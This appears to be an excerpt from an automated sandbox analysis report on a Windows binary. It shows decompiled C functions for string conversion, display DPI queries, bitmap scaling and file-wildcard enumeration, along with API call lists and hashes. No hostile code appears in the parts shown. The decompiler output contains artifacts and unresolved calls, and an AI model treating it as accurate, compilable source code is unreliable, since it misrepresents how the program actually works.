                                                    0x00ceca39
                                                    0x00ceca39
                                                    0x00000000
                                                    0x00ceca39
                                                    0x00ceca09
                                                    0x00ceca0d
                                                    0x00ceca12
                                                    0x00ceca16
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceca18
                                                    0x00000000

                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00CE47C6,00000000,00000000,00CE57FB,?,00CE57FB,?,00000001,00CE47C6,2DE85006,00000001,00CE57FB,00CE57FB), ref: 00CEC9D5
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CECA5E
                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00CECA70
                                                    • __freea.LIBCMT ref: 00CECA79
                                                      • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CE4286,?,0000015D,?,?,?,?,00CE5762,000000FF,00000000,?,?), ref: 00CE8E38
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                    • String ID:
                                                    • API String ID: 2652629310-0
                                                    • Opcode ID: 4cecba82f7041c9310d27fae9c8b297ac9fdac5b964994306cc73a198c01d210
                                                    • Instruction ID: fccd8347f622f2fbd09f0bb9759f4caa01c782054caef3d33c722815a1c33296
                                                    • Opcode Fuzzy Hash: 4cecba82f7041c9310d27fae9c8b297ac9fdac5b964994306cc73a198c01d210
                                                    • Instruction Fuzzy Hash: 4B31D032A0024AABDF24DF66CC85EBE7BA5EB41310B044129FC15E7250EB35CE51EB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDA663() {
				struct HDC__* _t1;
				struct HDC__* _t5;

				_t1 = GetDC(0);
				_t5 = _t1;
				if(_t5 != 0) {
					 *0xd08430 = GetDeviceCaps(_t5, 0x58);
					 *0xd08434 = GetDeviceCaps(_t5, 0x5a);
					return ReleaseDC(0, _t5);
				}
				return _t1;
			}





                                                    0x00cda666
                                                    0x00cda66c
                                                    0x00cda670
                                                    0x00cda67e
                                                    0x00cda68c
                                                    0x00000000
                                                    0x00cda691
                                                    0x00cda698

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00CDA666
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CDA675
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CDA683
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00CDA691
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 7b9ebd1f9fc24d79756ec4d58befa97d631f13e0066e121275a238fddcea5aec
                                                    • Instruction ID: 6682e51dd08cd82603d1eccb935c51377c3096ae7ba4cf8c88732c30896630c2
                                                    • Opcode Fuzzy Hash: 7b9ebd1f9fc24d79756ec4d58befa97d631f13e0066e121275a238fddcea5aec
                                                    • Instruction Fuzzy Hash: AAE0EC31942B21A7D2715F60AD0DB8A3E54AB25B52F010101FB09D6390DB6886028BB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 22%
                                                    			E00CDA80C(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				char _v140;
				intOrPtr* _v144;
				char _v156;
				intOrPtr* _v164;
				intOrPtr* _v168;
				intOrPtr _v176;
				char _v180;
				char _v184;
				intOrPtr* _v196;
				intOrPtr _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr _v232;
				intOrPtr* _v236;
				intOrPtr* _v244;
				void* _v256;
				void* _v260;
				intOrPtr* _v268;
				intOrPtr* _t94;
				void* _t96;
				intOrPtr* _t97;
				signed int _t100;
				intOrPtr* _t103;
				intOrPtr* _t106;
				short _t114;
				intOrPtr _t117;
				intOrPtr* _t118;
				intOrPtr* _t121;
				intOrPtr* _t124;
				intOrPtr* _t130;
				signed int _t133;
				intOrPtr* _t139;
				intOrPtr* _t143;
				void* _t148;
				signed int _t150;
				intOrPtr* _t156;
				intOrPtr* _t166;
				intOrPtr* _t169;
				char _t180;
				void* _t182;
				intOrPtr* _t186;
				signed int _t198;
				long long* _t202;
				long long _t204;

				_t204 = __fp0;
				_t202 =  &_v112;
				if(E00CDA699() != 0) {
					_t148 = _a4;
					GetObjectW(_t148, 0x18,  &_v68);
					_t150 = _v4;
					asm("cdq");
					_t198 = _v72 * _t150 / _v76;
					if(_t198 >= _v0) {
						_t198 = _v0;
					}
					if(_t150 != _v76 || _t198 != _v72) {
						_t180 = 0;
						_push( &_v124);
						_push(0xcf4754);
						_push(1);
						_push(0);
						_push(0xcf555c);
						if( *0xd23188() >= 0) {
							_t94 = _v144;
							 *0xcf3278(_t94, _t148, 0, 2,  &_v140, _t182);
							_t96 =  *((intOrPtr*)( *_t94 + 0x54))();
							_t97 = _v164;
							if(_t96 < 0) {
								L14:
								 *0xcf3278(_t97);
								 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 8))))();
								L21:
								_t100 =  *0xd230e4(_t148, _t180, _t180, _t180, _t180);
								L22:
								goto L23;
							}
							_v156 = 0;
							_t186 =  *((intOrPtr*)( *_t97 + 0x28));
							_t156 = _t186;
							 *0xcf3278(_t97,  &_v156);
							if( *_t186() < 0) {
								L13:
								_t103 = _v168;
								 *0xcf3278(_t103);
								 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
								_t97 = _v176;
								goto L14;
							}
							_t106 = _v164;
							asm("fldz");
							 *_t202 = _t204;
							 *0xcf3278(_t106, _v168, 0xcf556c, 0, 0, _t156, _t156, 0);
							if( *((intOrPtr*)( *_t106 + 0x20))() >= 0) {
								_v132 = _v84;
								_v116 = 0;
								_v128 =  ~_t198;
								_v112 = 0;
								_v124 = 1;
								_t114 = 0x20;
								_v122 = _t114;
								_v108 = 0;
								_v104 = 0;
								_v100 = 0;
								_v96 = 0;
								_v136 = 0x28;
								_v120 = 0;
								_v184 = 0;
								_t117 =  *0xd23058(0,  &_v136, 0,  &_v180, 0, 0);
								_v212 = _t117;
								if(_t117 != 0) {
									_t166 = _v228;
									 *0xcf3278(_t166,  &_v216);
									 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x2c))))();
									_t130 = _v224;
									 *0xcf3278(_t130, _v232, _v116, _t198, 3);
									 *((intOrPtr*)( *_t130 + 0x20))();
									_t133 = _v136;
									_t169 = _v244;
									_v216 = _t198;
									_v220 = _t133;
									_v228 = 0;
									_v224 = 0;
									 *0xcf3278(_t169,  &_v228, _t133 << 2, _t198 * _t133 << 2, _v232);
									if( *((intOrPtr*)( *_t169 + 0x1c))() < 0) {
										DeleteObject(_v260);
									} else {
										_v256 = _v260;
									}
									_t139 = _v268;
									 *0xcf3278(_t139);
									 *((intOrPtr*)( *((intOrPtr*)( *_t139 + 8))))();
								}
								_t118 = _v224;
								 *0xcf3278(_t118);
								 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 8))))();
								_t121 = _v224;
								 *0xcf3278(_t121);
								 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))();
								_t124 = _v236;
								 *0xcf3278(_t124);
								 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))();
								_t100 = _v220;
								if(_t100 != 0) {
									goto L22;
								} else {
									goto L21;
								}
							}
							_t143 = _v196;
							 *0xcf3278(_t143);
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 8))))();
							goto L13;
						}
						goto L8;
					} else {
						_t180 = 0;
						L8:
						_t100 =  *0xd230e4(_t148, _t180, _t180, _t180, _t180);
						L23:
						return _t100;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00CDAAC9();
			}



































































                                                    0x00cda80c
                                                    0x00cda80c
                                                    0x00cda816
                                                    0x00cda82f
                                                    0x00cda83c
                                                    0x00cda846
                                                    0x00cda850
                                                    0x00cda855
                                                    0x00cda85e
                                                    0x00cda860
                                                    0x00cda860
                                                    0x00cda86c
                                                    0x00cda87c
                                                    0x00cda87e
                                                    0x00cda87f
                                                    0x00cda887
                                                    0x00cda888
                                                    0x00cda889
                                                    0x00cda896
                                                    0x00cda8a8
                                                    0x00cda8bc
                                                    0x00cda8c2
                                                    0x00cda8c7
                                                    0x00cda8cb
                                                    0x00cda940
                                                    0x00cda948
                                                    0x00cda94e
                                                    0x00cdaab4
                                                    0x00cdaab9
                                                    0x00cdaabf
                                                    0x00000000
                                                    0x00cdaabf
                                                    0x00cda8cd
                                                    0x00cda8d9
                                                    0x00cda8dc
                                                    0x00cda8de
                                                    0x00cda8e8
                                                    0x00cda928
                                                    0x00cda928
                                                    0x00cda934
                                                    0x00cda93a
                                                    0x00cda93c
                                                    0x00000000
                                                    0x00cda93c
                                                    0x00cda8ea
                                                    0x00cda8ee
                                                    0x00cda8f5
                                                    0x00cda907
                                                    0x00cda912
                                                    0x00cda95c
                                                    0x00cda964
                                                    0x00cda968
                                                    0x00cda971
                                                    0x00cda975
                                                    0x00cda97a
                                                    0x00cda97d
                                                    0x00cda98c
                                                    0x00cda995
                                                    0x00cda99c
                                                    0x00cda9a3
                                                    0x00cda9aa
                                                    0x00cda9b2
                                                    0x00cda9b6
                                                    0x00cda9ba
                                                    0x00cda9c0
                                                    0x00cda9c6
                                                    0x00cda9cc
                                                    0x00cda9dd
                                                    0x00cda9e3
                                                    0x00cda9e5
                                                    0x00cda9fd
                                                    0x00cdaa03
                                                    0x00cdaa06
                                                    0x00cdaa11
                                                    0x00cdaa15
                                                    0x00cdaa1c
                                                    0x00cdaa23
                                                    0x00cdaa27
                                                    0x00cdaa3b
                                                    0x00cdaa46
                                                    0x00cdaa56
                                                    0x00cdaa48
                                                    0x00cdaa4c
                                                    0x00cdaa4c
                                                    0x00cdaa5c
                                                    0x00cdaa68
                                                    0x00cdaa6e
                                                    0x00cdaa6e
                                                    0x00cdaa70
                                                    0x00cdaa7c
                                                    0x00cdaa82
                                                    0x00cdaa84
                                                    0x00cdaa90
                                                    0x00cdaa96
                                                    0x00cdaa98
                                                    0x00cdaaa4
                                                    0x00cdaaaa
                                                    0x00cdaaac
                                                    0x00cdaab2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdaab2
                                                    0x00cda914
                                                    0x00cda920
                                                    0x00cda926
                                                    0x00000000
                                                    0x00cda926
                                                    0x00000000
                                                    0x00cda874
                                                    0x00cda874
                                                    0x00cda898
                                                    0x00cda89d
                                                    0x00cdaac0
                                                    0x00000000
                                                    0x00cdaac2
                                                    0x00cda86c
                                                    0x00cda818
                                                    0x00cda81c
                                                    0x00cda820
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00CDA699: GetDC.USER32(00000000), ref: 00CDA69D
                                                      • Part of subcall function 00CDA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CDA6A8
                                                      • Part of subcall function 00CDA699: ReleaseDC.USER32(00000000,00000000), ref: 00CDA6B3
                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00CDA83C
                                                      • Part of subcall function 00CDAAC9: GetDC.USER32(00000000), ref: 00CDAAD2
                                                      • Part of subcall function 00CDAAC9: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00CDA829,?,?,?), ref: 00CDAB01
                                                      • Part of subcall function 00CDAAC9: ReleaseDC.USER32(00000000,?), ref: 00CDAB99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ObjectRelease$CapsDevice
                                                    • String ID: (
                                                    • API String ID: 1061551593-3887548279
                                                    • Opcode ID: 1849bab8fa63c7581bf0a0eceadd55c04fc8caab172e6b69b323412777e70804
                                                    • Instruction ID: d2a442841180164461a85e03a1d30f6f47b70ab2b3609298fa9aa6aedbca9de7
                                                    • Opcode Fuzzy Hash: 1849bab8fa63c7581bf0a0eceadd55c04fc8caab172e6b69b323412777e70804
                                                    • Instruction Fuzzy Hash: C091D275604354AFD610DF25C848A2BBBE8FFC9710F00491EFA9AD3261DB30A946DF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E00CEB1B8(signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t136;
				void* _t138;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t150;
				void* _t153;
				CHAR* _t154;
				void* _t155;
				char _t157;
				char _t159;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t183;
				void* _t192;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t198;
				signed int _t200;
				union _FINDEX_INFO_LEVELS _t201;
				void* _t202;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				void* _t211;
				intOrPtr _t212;
				void* _t213;
				void* _t214;
				signed int _t217;
				void* _t219;
				signed int _t220;
				void* _t221;
				void* _t222;
				void* _t223;
				signed int _t224;
				void* _t225;
				void* _t226;

				_t80 = _a8;
				_t222 = _t221 - 0x20;
				if(_t80 != 0) {
					_t206 = _a4;
					_t159 = 0;
					 *_t80 = 0;
					_t197 = 0;
					_t150 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t206;
					if( *_t206 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t150 - _t197;
						_v8 = _t159;
						_t190 = (_t82 >> 2) + 1;
						__eflags = _t150 - _t197;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t208 =  !_t206 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t208;
						if(_t208 != 0) {
							_t195 = _t197;
							_t157 = _t159;
							do {
								_t183 =  *_t195;
								_t17 = _t183 + 1; // 0x1
								_v8 = _t17;
								do {
									_t142 =  *_t183;
									_t183 = _t183 + 1;
									__eflags = _t142;
								} while (_t142 != 0);
								_t157 = _t157 + 1 + _t183 - _v8;
								_t195 = _t195 + 4;
								_t144 = _v12 + 1;
								_v12 = _t144;
								__eflags = _t144 - _t208;
							} while (_t144 != _t208);
							_t190 = _v16;
							_v8 = _t157;
							_t150 = _v336.cAlternateFileName;
						}
						_t209 = E00CE8207(_t190, _v8, 1);
						_t223 = _t222 + 0xc;
						__eflags = _t209;
						if(_t209 != 0) {
							_t87 = _t209 + _v16 * 4;
							_v20 = _t87;
							_t191 = _t87;
							_v16 = _t87;
							__eflags = _t197 - _t150;
							if(_t197 == _t150) {
								L23:
								_t198 = 0;
								__eflags = 0;
								 *_a8 = _t209;
								goto L24;
							} else {
								_t93 = _t209 - _t197;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t162 =  *_t197;
									_v12 = _t162 + 1;
									do {
										_t95 =  *_t162;
										_t162 = _t162 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t163 = _t162 - _v12;
									_t35 = _t163 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00CEF101(_t163, _t191, _v20 - _t191 + _v8,  *_t197);
									_t223 = _t223 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00CE9097();
										asm("int3");
										_t219 = _t223;
										_push(_t163);
										_t164 = _v64;
										_t47 = _t164 + 1; // 0x1
										_t192 = _t47;
										do {
											_t103 =  *_t164;
											_t164 = _t164 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t197);
										_t200 = _a8;
										_t166 = _t164 - _t192 + 1;
										_v12 = _t166;
										__eflags = _t166 - (_t103 | 0xffffffff) - _t200;
										if(_t166 <= (_t103 | 0xffffffff) - _t200) {
											_push(_t150);
											_t50 = _t200 + 1; // 0x1
											_t153 = _t50 + _t166;
											_t211 = E00CEB136(_t166, _t153, 1);
											_t168 = _t209;
											__eflags = _t200;
											if(_t200 == 0) {
												L34:
												_push(_v12);
												_t153 = _t153 - _t200;
												_t108 = E00CEF101(_t168, _t211 + _t200, _t153, _v0);
												_t224 = _t223 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t136 = E00CEB587(_a12, _t192, __eflags, _t211);
													E00CE8DCC(0);
													_t138 = _t136;
													goto L36;
												}
											} else {
												_push(_t200);
												_t139 = E00CEF101(_t168, _t211, _t153, _a4);
												_t224 = _t223 + 0x10;
												__eflags = _t139;
												if(_t139 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00CE9097();
													asm("int3");
													_push(_t219);
													_t220 = _t224;
													_t225 = _t224 - 0x150;
													_t111 =  *0xcfe7ac; // 0x349e4b74
													_v116 = _t111 ^ _t220;
													_t169 = _v100;
													_push(_t153);
													_t154 = _v104;
													_push(_t211);
													_t212 = _v96;
													_push(_t200);
													_v440 = _t212;
													while(1) {
														__eflags = _t169 - _t154;
														if(_t169 == _t154) {
															break;
														}
														_t113 =  *_t169;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t169 = E00CEF150(_t154, _t169);
																	continue;
																}
															}
														}
														break;
													}
													_t193 =  *_t169;
													__eflags = _t193 - 0x3a;
													if(_t193 != 0x3a) {
														L47:
														_t201 = 0;
														__eflags = _t193 - 0x2f;
														if(_t193 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t193 - 0x5c;
															if(_t193 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t193 - 0x3a;
																if(_t193 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
														E00CDFFF0(_t201,  &_v336, _t201, 0x140);
														_t226 = _t225 + 0xc;
														_t213 = FindFirstFileExA(_t154, _t201,  &_v336, _t201, _t201, _t201);
														_t123 = _v340;
														__eflags = _t213 - 0xffffffff;
														if(_t213 != 0xffffffff) {
															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t173;
															_v348 = _t173 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t154);
																	_push(_t123);
																	L28();
																	_t226 = _t226 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t177 = _v291;
																	__eflags = _t177;
																	if(_t177 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t177 - 0x2e;
																		if(_t177 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t213,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t193 =  *_t123;
															_t178 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t178 - _t131;
															if(_t178 != _t131) {
																E00CE6310(_t154, _t193 + _t178 * 4, _t131 - _t178, 4, E00CEB1A0);
															}
														} else {
															_push(_t123);
															_push(_t201);
															_push(_t201);
															_push(_t154);
															L28();
															L54:
															_t201 = _t123;
														}
														__eflags = _t213 - 0xffffffff;
														if(_t213 != 0xffffffff) {
															FindClose(_t213);
														}
														_t124 = _t201;
													} else {
														_t124 =  &(_t154[1]);
														__eflags = _t169 -  &(_t154[1]);
														if(_t169 ==  &(_t154[1])) {
															goto L47;
														} else {
															_push(_t212);
															_push(0);
															_push(0);
															_push(_t154);
															L28();
														}
													}
													L58:
													_pop(_t202);
													_pop(_t214);
													__eflags = _v16 ^ _t220;
													_pop(_t155);
													return E00CDFBBC(_t124, _t155, _v16 ^ _t220, _t193, _t202, _t214);
												} else {
													goto L34;
												}
											}
										} else {
											_t138 = 0xc;
											L36:
											return _t138;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t194 = _v16;
									 *((intOrPtr*)(_v24 + _t197)) = _t194;
									_t197 = _t197 + 4;
									_t191 = _t194 + _v12;
									_v16 = _t194 + _v12;
									__eflags = _t197 - _t150;
								} while (_t197 != _t150);
								goto L23;
							}
						} else {
							_t198 = _t197 | 0xffffffff;
							L24:
							E00CE8DCC(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t159;
							_t146 = E00CEF110( *_t206,  &_v8);
							__eflags = _t146;
							if(_t146 != 0) {
								_push( &_v36);
								_push(_t146);
								_push( *_t206);
								L38();
								_t222 = _t222 + 0xc;
							} else {
								_t146 =  &_v36;
								_push(_t146);
								_push(0);
								_push(0);
								_push( *_t206);
								L28();
								_t222 = _t222 + 0x10;
							}
							_t198 = _t146;
							__eflags = _t198;
							if(_t198 != 0) {
								break;
							}
							_t206 = _t206 + 4;
							_t159 = 0;
							__eflags =  *_t206;
							if( *_t206 != 0) {
								continue;
							} else {
								_t150 = _v336.cAlternateFileName;
								_t197 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00CEB562( &_v36);
						_t91 = _t198;
						goto L26;
					}
				} else {
					_t147 = E00CE91A8();
					_t217 = 0x16;
					 *_t147 = _t217;
					E00CE9087();
					_t91 = _t217;
					L26:
					return _t91;
				}
				L68:
			}


























































































                                                    0x00ceb1bd
                                                    0x00ceb1c0
                                                    0x00ceb1c6
                                                    0x00ceb1de
                                                    0x00ceb1e1
                                                    0x00ceb1e5
                                                    0x00ceb1e7
                                                    0x00ceb1e9
                                                    0x00ceb1eb
                                                    0x00ceb1ee
                                                    0x00ceb1f1
                                                    0x00ceb1f4
                                                    0x00ceb1f6
                                                    0x00ceb24e
                                                    0x00ceb24e
                                                    0x00ceb254
                                                    0x00ceb256
                                                    0x00ceb261
                                                    0x00ceb265
                                                    0x00ceb267
                                                    0x00ceb26a
                                                    0x00ceb26e
                                                    0x00ceb26e
                                                    0x00ceb270
                                                    0x00ceb272
                                                    0x00ceb274
                                                    0x00ceb276
                                                    0x00ceb276
                                                    0x00ceb278
                                                    0x00ceb27b
                                                    0x00ceb27e
                                                    0x00ceb27e
                                                    0x00ceb280
                                                    0x00ceb281
                                                    0x00ceb281
                                                    0x00ceb28c
                                                    0x00ceb28e
                                                    0x00ceb291
                                                    0x00ceb292
                                                    0x00ceb295
                                                    0x00ceb295
                                                    0x00ceb299
                                                    0x00ceb29c
                                                    0x00ceb29f
                                                    0x00ceb29f
                                                    0x00ceb2ad
                                                    0x00ceb2af
                                                    0x00ceb2b2
                                                    0x00ceb2b4
                                                    0x00ceb2be
                                                    0x00ceb2c1
                                                    0x00ceb2c4
                                                    0x00ceb2c6
                                                    0x00ceb2c9
                                                    0x00ceb2cb
                                                    0x00ceb31b
                                                    0x00ceb31e
                                                    0x00ceb31e
                                                    0x00ceb320
                                                    0x00000000
                                                    0x00ceb2cd
                                                    0x00ceb2cf
                                                    0x00ceb2cf
                                                    0x00ceb2d1
                                                    0x00ceb2d4
                                                    0x00ceb2d4
                                                    0x00ceb2d9
                                                    0x00ceb2dc
                                                    0x00ceb2dc
                                                    0x00ceb2de
                                                    0x00ceb2df
                                                    0x00ceb2df
                                                    0x00ceb2e3
                                                    0x00ceb2e6
                                                    0x00ceb2e6
                                                    0x00ceb2e9
                                                    0x00ceb2ec
                                                    0x00ceb2f9
                                                    0x00ceb2fe
                                                    0x00ceb301
                                                    0x00ceb303
                                                    0x00ceb33d
                                                    0x00ceb33e
                                                    0x00ceb33f
                                                    0x00ceb340
                                                    0x00ceb341
                                                    0x00ceb342
                                                    0x00ceb347
                                                    0x00ceb34b
                                                    0x00ceb34d
                                                    0x00ceb34e
                                                    0x00ceb351
                                                    0x00ceb351
                                                    0x00ceb354
                                                    0x00ceb354
                                                    0x00ceb356
                                                    0x00ceb357
                                                    0x00ceb357
                                                    0x00ceb360
                                                    0x00ceb361
                                                    0x00ceb364
                                                    0x00ceb367
                                                    0x00ceb36a
                                                    0x00ceb36c
                                                    0x00ceb373
                                                    0x00ceb375
                                                    0x00ceb378
                                                    0x00ceb382
                                                    0x00ceb385
                                                    0x00ceb386
                                                    0x00ceb388
                                                    0x00ceb39c
                                                    0x00ceb39c
                                                    0x00ceb39f
                                                    0x00ceb3a9
                                                    0x00ceb3ae
                                                    0x00ceb3b1
                                                    0x00ceb3b3
                                                    0x00000000
                                                    0x00ceb3b5
                                                    0x00ceb3b9
                                                    0x00ceb3c2
                                                    0x00ceb3c8
                                                    0x00000000
                                                    0x00ceb3cb
                                                    0x00ceb38a
                                                    0x00ceb38a
                                                    0x00ceb390
                                                    0x00ceb395
                                                    0x00ceb398
                                                    0x00ceb39a
                                                    0x00ceb3d1
                                                    0x00ceb3d3
                                                    0x00ceb3d4
                                                    0x00ceb3d5
                                                    0x00ceb3d6
                                                    0x00ceb3d7
                                                    0x00ceb3d8
                                                    0x00ceb3dd
                                                    0x00ceb3e0
                                                    0x00ceb3e1
                                                    0x00ceb3e3
                                                    0x00ceb3e9
                                                    0x00ceb3f0
                                                    0x00ceb3f3
                                                    0x00ceb3f6
                                                    0x00ceb3f7
                                                    0x00ceb3fa
